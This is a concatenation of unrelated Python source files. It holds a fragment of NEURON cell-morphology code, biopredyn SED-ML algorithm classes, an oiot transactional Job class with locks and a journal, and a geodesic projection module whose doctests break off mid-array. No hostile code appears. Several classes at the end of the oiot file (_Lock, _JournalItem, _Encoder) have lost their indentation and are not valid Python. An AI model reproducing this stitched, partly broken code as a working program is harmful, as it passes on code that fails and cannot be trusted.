            p3d[1, i] = h.y3d(i) - p3dsoma[1] # shift coordinates such to place soma at the origin.
            p3d[2, i] = h.z3d(i) - p3dsoma[2]
            diam3d[i] = h.diam3d(i)
            l3d[i] = h.arc3d(i)
        l3d /= hSec.L # normalize
        # NOTE: 'nseg' is intentionally rebound here to the per-section count
        # (the totals above were only needed to size the arrays)
        nseg = hSec.nseg
        l0 = np.zeros(nseg) # keep range of segment starting point
        l1 = np.zeros(nseg) # keep range of segment ending point
        for iseg, seg in enumerate(hSec):
            l0[iseg] = seg.x - 0.5*1/nseg # x (normalized distance along the section) for the beginning of the segment
            l1[iseg] = seg.x + 0.5*1/nseg # x for the end of the segment
        # interpolate the 3D point data at the segment start/end arc positions
        p0[0, ix:ix+nseg] = np.interp(l0, l3d, p3d[0, :])
        p0[1, ix:ix+nseg] = np.interp(l0, l3d, p3d[1, :])
        p0[2, ix:ix+nseg] = np.interp(l0, l3d, p3d[2, :])
        d0[ix:ix+nseg] = np.interp(l0, l3d, diam3d[:])
        p1[0, ix:ix+nseg] = np.interp(l1, l3d, p3d[0, :])
        p1[1, ix:ix+nseg] = np.interp(l1, l3d, p3d[1, :])
        p1[2, ix:ix+nseg] = np.interp(l1, l3d, p3d[2, :])
        d1[ix:ix+nseg] = np.interp(l1, l3d, diam3d[:])
        ix += nseg
        h.pop_section() # undo the hSec.push() above
    self._morphSegCoords = {}
    self._morphSegCoords['p0'] = p0
    self._morphSegCoords['p1'] = p1
    self._morphSegCoords['d0'] = d0
    self._morphSegCoords['d1'] = d1
    return self._morphSegCoords
def __getstate__ (self):
    """Return a picklable copy of the instance dict (for py_alltoall).

    Non-picklable NEURON/h objects are replaced or dropped: function
    objects are substituted via sim.replaceFuncObj, and the
    'cellModelClass' and 'rand' entries are removed entirely.
    """
    from .. import sim
    state = dict(self.__dict__)  # shallow copy; the original dict stays intact
    state = sim.replaceFuncObj(state)  # swap h function objects for None
    for unpicklable in ('cellModelClass', 'rand'):
        del state[unpicklable]
    return state
|
|
#!/usr/bin/env python
# coding=utf-8
## @package biopredyn
## Copyright: [2012-2019] Cosmo Tech, All Rights Reserved
## License: BSD 3-Clause
import sys
import libsedml
## Representation of an algorithm in SED-ML workflows; an algorithm is defined
## using a KiSAO id along with several optional algorithm parameters.
class Algorithm:
  ## @var id
  # A unique identifier for this object.
  ## @var kisao_id
  # A KiSAO identifier (syntax KISAO:0000XYZ) for the algorithm encoded by this.
  ## @var name
  # Name of this object.
  ## @var parameters
  # A list of AlgorithmParameter objects.

  ## Constructor; either 'algo' or 'idf' and 'kid' must be passed as keyword
  ## argument(s).
  # @param self The object pointer.
  # @param algo A libsedml.SedAlgorithm element; optional (default: None).
  # @param idf A unique identifier; optional (default: None).
  # @param name A name for 'self'; optional (default: None).
  # @param kid A valid KiSAO identifier; optional (default: None).
  def __init__(self, algo=None, idf=None, name=None, kid=None):
    if algo is None and (idf is None or kid is None):
      raise RuntimeError("Either 'algo' or 'idf' and 'kid' must be " +
        "passed as keyword argument(s).")
    else:
      self.parameters = []
      if algo is not None:
        self.id = algo.getId()
        self.name = algo.getName()
        self.kisao_id = algo.getKisaoID()
        for p in algo.getListOfAlgorithmParameters():
          self.add_parameter(AlgorithmParameter(parameter=p))
      else:
        self.id = idf
        self.name = name
        self.kisao_id = kid

  ## Appends the input biopredyn.parameter.AlgorithmParameter object to
  ## self.parameters.
  # @param self The object pointer.
  # @param par A biopredyn.parameter.AlgorithmParameter object.
  def add_parameter(self, par):
    self.parameters.append(par)

  ## Getter. Returns self.id.
  # @param self The object pointer.
  # @return self.id
  def get_id(self):
    return self.id

  ## Getter. Returns self.kisao_id.
  # @param self The object pointer.
  # @return self.kisao_id
  def get_kisao_id(self):
    return self.kisao_id

  ## Getter. Returns self.name.
  # @param self The object pointer.
  # @return self.name
  def get_name(self):
    return self.name

  ## Getter. Returns the first AlgorithmParameter object with the input id in
  ## self.parameters, or None if no parameter matches.
  # @param self The object pointer.
  # @param id ID of the object to be returned in self.parameters.
  # @return An AlgorithmParameter object, or None.
  def get_parameter_by_id(self, id):
    # Return on the first match: the previous implementation kept scanning
    # and effectively returned the *last* match, contradicting the
    # documented "first" semantics when ids were duplicated.
    for p in self.parameters:
      if (p.get_id() == id):
        return p
    return None

  ## Getter. Returns the first AlgorithmParameter object with the input name in
  ## self.parameters, or None if no parameter matches.
  # @param self The object pointer.
  # @param name Name of the object to be returned in self.parameters.
  # @return An AlgorithmParameter object, or None.
  def get_parameter_by_name(self, name):
    # Same early-return fix as get_parameter_by_id.
    for p in self.parameters:
      if (p.get_name() == name):
        return p
    return None

  ## Getter. Returns self.parameters.
  # @param self The object pointer.
  # @return self.parameters
  def get_parameters(self):
    return self.parameters

  ## Setter for self.id.
  # @param self The object pointer.
  # @param id New value for self.id
  def set_id(self, id):
    self.id = id

  ## Setter for self.kisao_id.
  # @param self The object pointer.
  # @param kisao_id New value for self.kisao_id
  def set_kisao_id(self, kisao_id):
    self.kisao_id = kisao_id

  ## Setter for self.name.
  # @param self The object pointer.
  # @param name New value for self.name
  def set_name(self, name):
    self.name = name

  ## Returns the libsedml.SedAlgorithm representation of this.
  # @param self The object pointer.
  # @param level Level of SED-ML language to be used.
  # @param version Version of SED-ML language to be used.
  # @return A libsedml.SedAlgorithm object.
  def to_sedml(self, level, version):
    alg = libsedml.SedAlgorithm(level, version)
    if self.get_name() is not None:
      alg.setName(str(self.get_name()))
    alg.setKisaoID(self.get_kisao_id())
    for p in self.get_parameters():
      alg.addAlgorithmParameter(p.to_sedml(level, version))
    return alg
## Representation of an algorithm parameter in SED-ML workflows; an algorithm
## parameter is defined using a KiSAO id, and has a value.
class AlgorithmParameter:
  ## @var id
  # A unique identifier for this object.
  ## @var kisao_id
  # A KiSAO identifier (syntax KISAO:0000XYZ) for the parameter encoded by this.
  ## @var name
  # Name of this object.
  ## @var value
  # A string value for this parameter.

  ## Constructor; initialization requires either a libsedml 'parameter'
  ## element, or the explicit 'idf', 'kid' and 'value' keyword arguments.
  # @param self the object pointer.
  # @param parameter A libsedml.SedAlgorithmParameter object; optional (default:
  # None).
  # @param idf A unique identifier; optional (default: None).
  # @param name A name for 'self'; optional (default: None).
  # @param kid A valid KiSAO identifier; optional (default: None).
  # @param value A string value for this parameter; optional (default: None).
  def __init__(self, parameter=None, idf=None, name=None, kid=None, value=None):
    if parameter is None and (idf is None or kid is None or value is None):
      raise RuntimeError("Either 'parameter' or 'idf', 'kid' and " +
        "'value' must be passed as keyword argument(s).")
    if parameter is not None:
      # Populate from the SED-ML element.
      self.id = parameter.getId()
      self.name = parameter.getName()
      self.kisao_id = parameter.getKisaoID()
      self.value = parameter.getValue()
    else:
      # Populate from the explicit keyword arguments.
      self.id = idf
      self.name = name
      self.kisao_id = kid
      self.value = value

  ## Getter for self.id.
  # @param self The object pointer.
  # @return self.id
  def get_id(self):
    return self.id

  ## Getter for self.kisao_id.
  # @param self The object pointer.
  # @return self.kisao_id
  def get_kisao_id(self):
    return self.kisao_id

  ## Getter for self.name.
  # @param self The object pointer.
  # @return self.name
  def get_name(self):
    return self.name

  ## Getter for self.value.
  # @param self The object pointer.
  # @return self.value
  def get_value(self):
    return self.value

  ## Setter for self.id.
  # @param self The object pointer.
  # @param id New value for self.id
  def set_id(self, id):
    self.id = id

  ## Setter for self.kisao_id.
  # @param self The object pointer.
  # @param kisao_id New value for self.kisao_id
  def set_kisao_id(self, kisao_id):
    self.kisao_id = kisao_id

  ## Setter for self.name.
  # @param self The object pointer.
  # @param name New value for self.name
  def set_name(self, name):
    self.name = name

  ## Setter for self.value.
  # @param self The object pointer.
  # @param value New value for self.value
  def set_value(self, value):
    self.value = value

  ## Builds and returns the libsedml.SedAlgorithmParameter equivalent of this.
  # @param self The object pointer.
  # @param level Level of SED-ML language to be used.
  # @param version Version of SED-ML language to be used.
  # @return A libsedml.SedAlgorithmParameter object.
  def to_sedml(self, level, version):
    sed_par = libsedml.SedAlgorithmParameter(level, version)
    sed_par.setId(self.get_id())
    if self.get_name() is not None:
      sed_par.setName(str(self.get_name()))
    sed_par.setKisaoID(self.get_kisao_id())
    sed_par.setValue(str(self.get_value()))
    return sed_par
|
|
"""
oiot.job
~~~~~~~~~
This module implements the Job class.
:copyright: (c) 2014 by Konstantin Bokarius.
:license: MIT, see LICENSE for more details.
"""
import os, sys, traceback, binascii, json, random, string, \
datetime, uuid
from datetime import datetime
from .settings import _locks_collection, _jobs_collection, \
_max_job_time_in_ms, _deleted_object_value
from .exceptions import JobIsRolledBack, JobIsFailed, FailedToComplete, \
FailedToRollBack, RollbackCausedByException, JobIsTimedOut, \
CollectionKeyIsLocked, JobIsCompleted, _get_httperror_status_code
class Job:
    """
    A class used for executing o.io operations as a single atomic
    transaction by utilizing locking and journaling mechanisms.
    """

    def __init__(self, client):
        """
        Create a Job instance.
        :param client: the client to use
        """
        self._job_id = Job._generate_key()
        self._timestamp = datetime.utcnow()
        self._client = client
        self._locks = []
        self._journal = []
        self.is_completed = False
        self.is_rolled_back = False
        # A job should fail only in the event of an exception during
        # completion or roll-back.
        self.is_failed = False

    @staticmethod
    def _generate_key():
        """
        Generate a random 16 character hexadecimal string.
        :return: a random 16 character hexadecimal string.
        """
        # Decode so the result really is a 16-char str on Python 3;
        # str() of the bytes object would produce "b'...'" (19 chars),
        # leaking the bytes repr into keys and lock names.
        return binascii.b2a_hex(os.urandom(8)).decode('ascii')

    @staticmethod
    def _get_lock_collection_key(collection_to_lock, key_to_lock):
        """
        Get the key used for the locks collection based on the specified
        collection name key.
        :param collection_to_lock: the collection name to lock
        :param key_to_lock: the key to lock
        :return: the formatted locks collection key
        """
        return collection_to_lock + "-" + str(key_to_lock)

    @staticmethod
    def _create_and_add_lock(client, collection, key, job_id, timestamp):
        """
        Create and add a lock to the locks collection. This will instantiate a
        lock object, add its details to the locks collection in o.io, and return
        the lock instance.
        :param client: the client to use
        :param collection: the collection name
        :param key: the key
        :param job_id: the job ID
        :param timestamp: the timestamp
        :return: the created lock
        :raises CollectionKeyIsLocked: if another job already holds the lock
        """
        lock = _Lock(job_id, timestamp, datetime.utcnow(),
                collection, key, None)
        # if-no-match put (False ref): a 412 means someone else holds it.
        lock_response = client.put(_locks_collection,
                Job._get_lock_collection_key(collection, key),
                json.loads(json.dumps(vars(lock), cls=_Encoder)),
                False, False)
        if lock_response.status_code == 412:
            raise CollectionKeyIsLocked
        lock_response.raise_for_status()
        lock.lock_ref = lock_response.ref
        return lock

    @staticmethod
    def _roll_back_journal_item(client, journal_item, raise_if_timed_out):
        """
        Roll back the specified journal item.
        :param client: the client to use
        :param journal_item: the journal item to roll back
        :param raise_if_timed_out: the method to call if the roll back times out
        """
        # Don't attempt to roll-back if the original value and the
        # new value are the same.
        if journal_item.original_value == journal_item.new_value:
            return
        raise_if_timed_out()
        was_objected_deleted = journal_item.new_value == _deleted_object_value
        get_response = client.get(journal_item.collection,
                journal_item.key, None, False)
        try:
            get_response.raise_for_status()
        except Exception as e:
            # A 404 is expected (and fine) when the job deleted the record;
            # anything else is a real error.
            if _get_httperror_status_code(e) == 404:
                if was_objected_deleted is False:
                    return
            else:
                raise e
        # Don't attempt to roll-back if the new value does not match
        # unless the record was deleted by the job.
        if (was_objected_deleted is False and
                get_response.json != journal_item.new_value):
            return
        # Was there an original value?
        if journal_item.original_value:
            # Put back the original value only if the new
            # value matches or if the record was deleted by
            # the job.
            if ((was_objected_deleted and
                    get_response.status_code == 404) or
                    (was_objected_deleted is False and
                    get_response.json == journal_item.new_value)):
                original_ref = False
                if was_objected_deleted is False:
                    original_ref = get_response.ref
                raise_if_timed_out()
                try:
                    put_response = client.put(
                            journal_item.collection,
                            journal_item.key,
                            journal_item.original_value,
                            original_ref, False)
                    put_response.raise_for_status()
                except Exception as e:
                    # Ignore 412 error if the ref did not match.
                    if (_get_httperror_status_code(e) == 412):
                        return
                    else:
                        raise e
        # No original value indicates that a new record was
        # added and should be deleted.
        else:
            raise_if_timed_out()
            try:
                delete_response = client.delete(
                        journal_item.collection,
                        journal_item.key,
                        get_response.ref, False)
                delete_response.raise_for_status()
            except Exception as e:
                # Ignore 412 error if the ref did not match.
                if (_get_httperror_status_code(e) == 412):
                    return
                else:
                    raise e

    def _verify_job_is_active(self):
        """
        Verify that this job is active and raise an exception if it is not.
        :raises JobIsFailed, JobIsCompleted, JobIsRolledBack, JobIsTimedOut
        """
        if self.is_failed:
            raise JobIsFailed
        elif self.is_completed:
            raise JobIsCompleted
        elif self.is_rolled_back:
            raise JobIsRolledBack
        self._raise_if_job_is_timed_out()

    def _raise_if_job_is_timed_out(self):
        """
        Verify that this job is not timed out and raise an exception
        if it is.
        """
        elapsed_milliseconds = (datetime.utcnow() -
                self._timestamp).total_seconds() * 1000.0
        if elapsed_milliseconds > _max_job_time_in_ms:
            raise JobIsTimedOut('Ran for ' + str(elapsed_milliseconds) + 'ms')

    def _remove_locks(self):
        """
        Remove all locks associated with this job from o.io.
        """
        for lock in self._locks:
            self._raise_if_job_is_timed_out()
            response = self._client.delete(_locks_collection,
                    Job._get_lock_collection_key(lock.collection, lock.key),
                    lock.lock_ref, False)
            response.raise_for_status()
        self._locks = []

    def _remove_job(self):
        """
        Remove this job from o.io.
        """
        self._raise_if_job_is_timed_out()
        response = self._client.delete(_jobs_collection, self._job_id,
                None, False)
        response.raise_for_status()
        self._journal = []

    def _get_lock(self, collection, key):
        """
        Create a lock for the specified collection and key and add
        it to o.io. Re-uses a lock already held by this job.
        :param collection: the specified collection to lock
        :param key: the specified key to lock
        :return: the created (or already-held) lock
        """
        for lock in self._locks:
            if lock.collection == collection and lock.key == key:
                return lock
        self._raise_if_job_is_timed_out()
        lock = Job._create_and_add_lock(self._client, collection, key,
                self._job_id, self._timestamp)
        self._locks.append(lock)
        return lock

    def _add_journal_item(self, collection, key, new_value, original_value):
        """
        Add a journal item to this job and persist the journal to o.io.
        :param collection: the collection
        :param key: the key
        :param new_value: the new value
        :param original_value: the original value
        :return: the created journal item
        """
        self._raise_if_job_is_timed_out()
        journal_item = _JournalItem(datetime.utcnow(), collection, key,
                original_value, new_value)
        self._journal.append(journal_item)
        job_response = self._client.put(_jobs_collection, self._job_id,
                json.loads(json.dumps({'timestamp': self._timestamp,
                'items': self._journal}, cls=_Encoder)), None, False)
        job_response.raise_for_status()
        return journal_item

    def get(self, collection, key, ref = None):
        """
        Execute a get operation via this job by locking the collection key
        prior to executing the operation.
        :param collection: the collection
        :param key: the key
        :param ref: the ref
        :return: the operation's response
        """
        self._verify_job_is_active()
        try:
            lock = self._get_lock(collection, key)
            self._raise_if_job_is_timed_out()
            response = self._client.get(collection, key, ref, False)
            response.raise_for_status()
            self._raise_if_job_is_timed_out()
            return response
        except Exception as e:
            # roll_back re-raises as RollbackCausedByException.
            self.roll_back((e, traceback.format_exc()))

    def post(self, collection, value):
        """
        Execute a post operation via this job by generating a new key and
        delegating to put.
        :param collection: the collection
        :param value: the value to store under a freshly generated key
        :return: the operation's response
        """
        key = Job._generate_key()
        return self.put(collection, key, value)

    def put(self, collection, key, value, ref = None):
        """
        Execute a put operation via this job by locking the collection key
        prior to executing the operation.
        :param collection: the collection
        :param key: the key
        :param value: the value to store
        :param ref: the ref
        :return: the operation's response
        """
        self._verify_job_is_active()
        try:
            lock = self._get_lock(collection, key)
            self._raise_if_job_is_timed_out()
            # If ref was passed, ensure that the value has not changed.
            # If ref was not passed, retrieve the current ref and store it.
            response = self._client.get(collection, key, ref, False)
            # Default to None (new record) so original_value is always
            # bound even for unexpected non-404/200 success codes (the
            # previous version left it unbound in that case).
            original_value = None
            # Indicates an existing record will be updated so store the
            # original value for roll-back.
            if response.status_code == 200:
                original_value = response.json
            # 404 indicates a new record will be created; any other
            # status surfaces HTTP errors here.
            elif response.status_code != 404:
                response.raise_for_status()
            journal_item = self._add_journal_item(collection, key,
                    value, original_value)
            self._raise_if_job_is_timed_out()
            response = self._client.put(collection, key, value, ref, False)
            response.raise_for_status()
            self._raise_if_job_is_timed_out()
            return response
        except Exception as e:
            self.roll_back((e, traceback.format_exc()))

    def delete(self, collection, key, ref = None):
        """
        Execute a delete operation via this job by locking the collection key
        prior to executing the operation.
        :param collection: the collection
        :param key: the key
        :param ref: the ref
        :return: the operation's response
        """
        self._verify_job_is_active()
        try:
            lock = self._get_lock(collection, key)
            self._raise_if_job_is_timed_out()
            # The record must be present in order to delete it.
            response = self._client.get(collection, key, ref, False)
            response.raise_for_status()
            original_value = response.json
            journal_item = self._add_journal_item(collection, key,
                    _deleted_object_value, original_value)
            self._raise_if_job_is_timed_out()
            response = self._client.delete(collection, key, ref, False)
            response.raise_for_status()
            self._raise_if_job_is_timed_out()
            return response
        except Exception as e:
            self.roll_back((e, traceback.format_exc()))

    def roll_back(self, exception_causing_rollback = None):
        """
        Rolls back this job by rolling back each journal item and removing
        the locks associated with the job and the job itself.
        :param exception_causing_rollback: the exception that caused
        the roll back
        :raises RollbackCausedByException: when triggered by an exception
        :raises FailedToRollBack: when the roll back itself fails
        """
        self._verify_job_is_active()
        try:
            for journal_item in self._journal:
                Job._roll_back_journal_item(self._client, journal_item,
                        self._raise_if_job_is_timed_out)
            self._remove_job()
            self._remove_locks()
            self.is_rolled_back = True
            if exception_causing_rollback:
                raise RollbackCausedByException(exception_causing_rollback[0],
                        exception_causing_rollback[1])
        except RollbackCausedByException as e:
            raise e
        except Exception as e:
            self.is_failed = True
            if exception_causing_rollback:
                raise FailedToRollBack(e, traceback.format_exc(),
                        exception_causing_rollback[0],
                        exception_causing_rollback[1])
            else:
                raise FailedToRollBack(e, traceback.format_exc())

    def complete(self):
        """
        Completes this job by removing the locks associated with the job
        and the job itself.
        :raises FailedToComplete: when clean-up fails
        """
        self._verify_job_is_active()
        try:
            self._remove_job()
            self._remove_locks()
            self.is_completed = True
        except Exception as e:
            self.is_failed = True
            raise FailedToComplete(e, traceback.format_exc())
class _Lock(object):
"""
Represents a read-write lock and its information.
"""
def __init__(self, job_id = None, job_timestamp = None, timestamp = None,
collection = None, key = None, lock_ref = None):
"""
Create a Lock instance.
:param job_id: the job ID
:param job_timestamp: the job timestamp
:param timestamp: the lock timestamp
:param collection: the collection
:param key: the key
:param lock_ref: the o.io ref value for the lock object
"""
self.job_id = job_id
self.job_timestamp = job_timestamp
self.timestamp = timestamp
self.collection = collection
self.key = key
self.lock_ref = lock_ref
class _JournalItem(object):
"""
Represents a journal item and its information.
"""
def __init__(self, timestamp = None, collection = None, key = None,
original_value = None, new_value = None):
"""
Create a JournalItem instance.
:param timestamp: the timestamp
:param collection: the collection
:param key: the key
:param original_value: the original value
:param new_value: the new value
"""
self.timestamp = timestamp
self.collection = collection
self.key = key
self.original_value = original_value
self.new_value = new_value
class _Encoder(json.JSONEncoder):
"""
Determines how to properly encode objects into JSON.
"""
def default(self, obj):
if isinstance(obj, datetime):
return obj.isoformat()
elif isinstance(obj, _JournalItem):
return vars(obj)
elif isinstance(obj, uuid.UUID):
return str(obj)
return json.JSONEncoder.default(self, obj)
|
|
# -*- coding: utf-8 -*-
"""
Transformations from the breakdowns to some surface in 3-space
(sometimes 2-space)
Attributes:
PROJECTIONS: A map of maps. The first map is keyed on the name of a family
of projections, and the second is keyed on shape (3 or 4). For
instance, PROJECTIONS['nslerp'][3] gives the function to perform
nslerp on a triangle.
PARALLEL: A list of which projections are compatible with
parallel projection.
"""
import numpy as np
from numpy.linalg import norm
from . import xmath, breakdown
# --- Fixtures shared by the doctests below ---
# Equilateral spherical triangle / square (vertex coordinates on the sphere).
_TEST_EQ_TRI = np.eye(3)
_TEST_EQ_Q = xmath.normalize(np.array([[1, 0, 1],
                                       [0, 1, 1],
                                       [-1, 0, 1],
                                       [0, -1, 1]]))
# Skewed (non-equilateral) counterparts of the above.
_TEST_SKEW_TRI = np.array([[0.8, 0.6, 0],
                           [0, 1, 0],
                           [0, 0, 1]])
_TEST_SKEW_Q = xmath.normalize(np.array([[1, 0, 1],
                                         [0, 1, 1],
                                         [-1, 0, 1],
                                         [0, -1, 0]]))
# Sample barycentric coordinates (each row sums to 1) and xy samples in [0,1]^2.
_TEST_BARY = np.array([[1, 0.8, 0.6, 0.4, 0.2, 0.0],
                       [0, 0.2, 0.2, 0.2, 0.5, 0.5],
                       [0, 0.0, 0.2, 0.4, 0.3, 0.5]]).T
_TEST_XY = np.array([[0, 1, 1, 0, 0.5, 0.5, 0.5, 0.3, 0.3, 0.3],
                     [0, 0, 1, 1, 0, 0.5, 1, 0, 0.5, 1]]).T
# Subdivision frequency and linear indexes corresponding to that frequency.
_TEST_FREQ = 4, 2
_TEST_TRI_LINDEX = np.array([[0, 4, 6],
                             [1, 4, 5],
                             [2, 3, 5],
                             [3, 2, 5],
                             [2, 4, 4],
                             [3, 3, 4]])
_TEST_Q_LINDEX = np.array([[2, 0],
                           [2, 1],
                           [3, 1],
                           [4, 1],
                           [1, 2],
                           [2, 2]])
# Points spiraling out to the unit circle, as complex values and 2d reals.
_TEST_DISK_C = np.exp(np.linspace(0, 2j*np.pi, 7))*np.linspace(0, 1, 7)
_TEST_DISK_R = xmath.complex_to_float2d(_TEST_DISK_C)
# Points in the skew test triangle, and their projections onto the sphere.
_TEST_TRI_PTS = np.array([[0.8, 0.6, 0],
                          [0, 1, 0],
                          [0, 0, 1],
                          [0.4, 0.8, 0],
                          [0, 0.5, 0.5],
                          [0.4, 0.3, 0.5],
                          [4/15, 8/15, 1/3]])
_TEST_SPHERE_PTS = xmath.normalize(_TEST_TRI_PTS)
#generic methods, valid on any-d, any shape
def square_to_quad(xy, base_pts):
    """Maps the unit square [0,1]^2 onto a (possibly skew) quadrilateral
    defined by base_pts, by bilinear interpolation.
    Args:
        xy: Array, shape [..., 2]. The 2d coordinates of the point.
        base_pts: Array, shape [4, ...]. The coordinates of the quadrilateral.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        Coordinates in whatever space base_pts was defined in.
    >>> square_to_quad(_TEST_XY[:, np.newaxis], _TEST_SKEW_Q)
    array([[ 0.70710678,  0.        ,  0.70710678],
           [ 0.        ,  0.70710678,  0.70710678],
           [-0.70710678,  0.        ,  0.70710678],
           [ 0.        , -1.        ,  0.        ],
           [ 0.35355339,  0.35355339,  0.70710678],
           [ 0.        , -0.0732233 ,  0.53033009],
           [-0.35355339, -0.5       ,  0.35355339],
           [ 0.49497475,  0.21213203,  0.70710678],
           [ 0.14142136, -0.24393398,  0.45961941],
           [-0.21213203, -0.7       ,  0.21213203]])
    """
    p0, p1, p2, p3 = base_pts[0], base_pts[1], base_pts[2], base_pts[3]
    u = xy[..., 0]
    v = xy[..., 1]
    # bilinear form written with p0 as the origin
    return p0 + (p1 - p0)*u + (p3 - p0)*v + (p0 - p1 + p2 - p3)*u*v
def tri_bary(bary, base_pts):
    """Transforms barycentric coordinates to a (Euclidean) triangle
    defined by base_pts.
    Args:
        bary: Array, shape [..., 3]. Barycentric coordinates.
        base_pts: Array, shape [3, ...]. Coordinates of the triangle.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        Coordinates in whatever space base_pts was defined in.
    >>> tri_bary(_TEST_BARY, _TEST_SKEW_TRI)
    array([[ 0.8 ,  0.6 ,  0.  ],
           [ 0.64,  0.68,  0.  ],
           [ 0.48,  0.56,  0.2 ],
           [ 0.32,  0.44,  0.4 ],
           [ 0.16,  0.62,  0.3 ],
           [ 0.  ,  0.5 ,  0.5 ]])
    """
    # plain linear combination of the vertices by the barycentric weights
    return np.dot(bary, base_pts)
#methods for disks
def square_to_disk(xy, rotation=1):
    """Transforms square on [0,1]^2 to unit disk.
    >>> np.round(square_to_disk(_TEST_XY), 6)
    array([[-0.707107, -0.707107],
           [ 0.707107, -0.707107],
           [ 0.707107,  0.707107],
           [-0.707107,  0.707107],
           [ 0.      , -1.      ],
           [ 0.      ,  0.      ],
           [ 0.      ,  1.      ],
           [-0.371391, -0.928477],
           [-0.4     ,  0.      ],
           [-0.371391,  0.928477]])
    """
    # recenter onto [-1,1]^2; the radius is the Chebyshev norm, so the
    # square's boundary lands exactly on the unit circle
    centered = 2*xy - 1
    radius = np.max(np.abs(centered), axis=-1)
    theta = np.arctan2(centered[..., 1], centered[..., 0])
    return xmath.complex_to_float2d(radius*np.exp(1j*theta)*rotation)
# Vertices of an equilateral triangle inscribed in the unit circle,
# starting at +i (as complex numbers, and as 2d real coordinates).
DISK_TRI_C = np.exp(2j*np.pi/3*np.arange(3))*1j
DISK_TRI_R = xmath.complex_to_float2d(DISK_TRI_C)
def tri_to_disk(bary, rotation=1, pts=DISK_TRI_C):
    """Transforms triangle in barycentric coordinates to unit disk.
    tri_naive_slerp also does this when pts are on a great circle,
    with somewhat different results.
    >>> np.round(tri_to_disk(_TEST_BARY), 6)
    array([[ 0.      ,  1.      ],
           [-0.240192,  0.970725],
           [-0.      ,  0.4     ],
           [ 0.34641 ,  0.2     ],
           [-0.261861, -0.302372],
           [-0.      , -1.      ]])
    """
    # direction comes from the barycentric blend of the vertices;
    # radius runs from 0 at the centroid to 1 on the triangle's edges
    blend = bary.dot(pts)
    theta = np.angle(blend)
    radius = 1 - 3*bary.min(axis=-1)
    return xmath.complex_to_float2d(radius*np.exp(1j*theta)*rotation)
# Vertices of a square inscribed in the unit circle (complex and 2d real).
DISK_SQ_C = np.array([1, 1j, -1, -1j])
DISK_SQ_R = xmath.complex_to_float2d(DISK_SQ_C)
def _sq_disk(bkdn, base_pts, freq, tweak):
    # Breakdown coords -> disk -> rescaled into [0,1]^2 -> quadrilateral.
    # freq and tweak are accepted for interface parity with the other
    # projection callables but are unused here.
    disk = square_to_disk(bkdn.coord)
    unit = disk/np.sqrt(2) + 0.5
    return square_to_quad(unit[:, np.newaxis], base_pts)
def _tri_disk(bkdn, base_pts, freq, tweak):
    # As _sq_disk but for triangles: disk coords are converted back to
    # barycentric coordinates and then mapped onto base_pts.
    disk = tri_to_disk(bkdn.coord)
    return tri_bary(bary_tri(disk, DISK_TRI_R), base_pts)
#disk -> sphere
def spherical_to_xyz(phi, theta):
    """Converts spherical coordinates to 3d xyz coordinates.
    Args:
        phi: Inclination
        theta: Azimuth
    Returns:
        An array with of shape = [..., 3].
    >>> phi = np.arccos(np.linspace(-1, 1, 7))
    >>> theta = np.arcsin(np.linspace(-1, 1, 7))
    >>> np.round(spherical_to_xyz(phi, theta), 6)
    array([[ 0.      , -0.      , -1.      ],
           [ 0.555556, -0.496904, -0.666667],
           [ 0.888889, -0.31427 , -0.333333],
           [ 1.      ,  0.      ,  0.      ],
           [ 0.888889,  0.31427 ,  0.333333],
           [ 0.555556,  0.496904,  0.666667],
           [ 0.      ,  0.      ,  1.      ]])
    """
    sin_phi = np.sin(phi)
    return np.array([sin_phi * np.cos(theta),  # pylint: disable=no-member
                     sin_phi * np.sin(theta),
                     np.cos(phi)]).T
def lambert(disk):
    """Converts coordinates on the disk to spherical coordinates, using
    the Lambert azimuthal equal-area projection.
    Args:
        disk: Array of shape [..., 2] representing points on the disk.
    Returns:
        phi, theta: Spherical coordinates
    >>> phi, theta = lambert(_TEST_DISK_R)
    >>> np.round(phi*180/np.pi, 2)
    array([   0.  ,   19.19,   38.94,   60.  ,   83.62,  112.89,  180.  ])
    >>> np.round(theta*180/np.pi, 2)
    array([   0.,   60.,  120.,  180., -120.,  -60.,   -0.])
    """
    x, y = disk[..., 0], disk[..., 1]
    theta = np.arctan2(y, x)
    # inverse of the equal-area radial scaling r = 2*sin(phi/2)... / 2
    phi = 2*np.arcsin(norm(disk, axis=-1))
    return phi, theta
def equidistant(disk):
    """Converts coordinates on the disk to spherical coordinates, using
    the azimuthal equal-distance projection.
    Args:
        disk: Array of shape [..., 2] representing points on the disk.
    Returns:
        phi, theta: Spherical coordinates
    >>> phi, theta = equidistant(_TEST_DISK_R)
    >>> np.round(phi*180/np.pi, 2)
    array([   0.,   30.,   60.,   90.,  120.,  150.,  180.])
    >>> np.round(theta*180/np.pi, 2)
    array([   0.,   60.,  120.,  180., -120.,  -60.,   -0.])
    """
    x, y = disk[..., 0], disk[..., 1]
    theta = np.arctan2(y, x)
    # inclination is simply proportional to the distance from the center
    phi = norm(disk, axis=-1)*np.pi
    return phi, theta
#methods for spheres
#triangles -> spherical triangle
def tri_naive_slerp(bary, base_pts):
    """
    Naive slerp (spherical linear interpolation) on a spherical triangle.
    Args:
        bary: Array, shape [..., 3]. Barycentric coordinates.
        base_pts: Array, shape [3, ..., 3]. Coordinates of the triangle.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        An array of shape [..., 3], representing points in 3d-space.
    >>> tri_naive_slerp(_TEST_BARY, _TEST_EQ_TRI)
    array([[ 1.        ,  0.        ,  0.        ],
           [ 0.95105652,  0.30901699,  0.        ],
           [ 0.80901699,  0.30901699,  0.30901699],
           [ 0.58778525,  0.30901699,  0.58778525],
           [ 0.30901699,  0.70710678,  0.4539905 ],
           [ 0.        ,  0.70710678,  0.70710678]])
    """
    # slerp weight sin(t*angle)/sin(angle) applied per barycentric
    # component; relies on a single central angle (equilateral triangle)
    angle = xmath.central_angle_equilateral(base_pts)
    weights = np.sin(bary * angle) / np.sin(angle)
    return weights.dot(base_pts)
def tri_areal(bary, base_pts):
    """Given a triangle and spherical areal coordinates, returns the vectors
    corresponding to those coordinates.
    Args:
        bary: Array, shape [..., 3]. Barycentric coordinates.
        base_pts: Array, shape [3, ..., 3]. Coordinates of the triangle.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        An array of shape [..., 3], representing points in 3d-space.
    >>> tri_areal(_TEST_BARY, _TEST_SKEW_TRI)
    array([[ 0.8       ,  0.6       ,  0.        ],
           [ 0.67564273,  0.7372292 ,  0.        ],
           [ 0.59542957,  0.71123145,  0.37364883],
           [ 0.42703426,  0.59682523,  0.67929477],
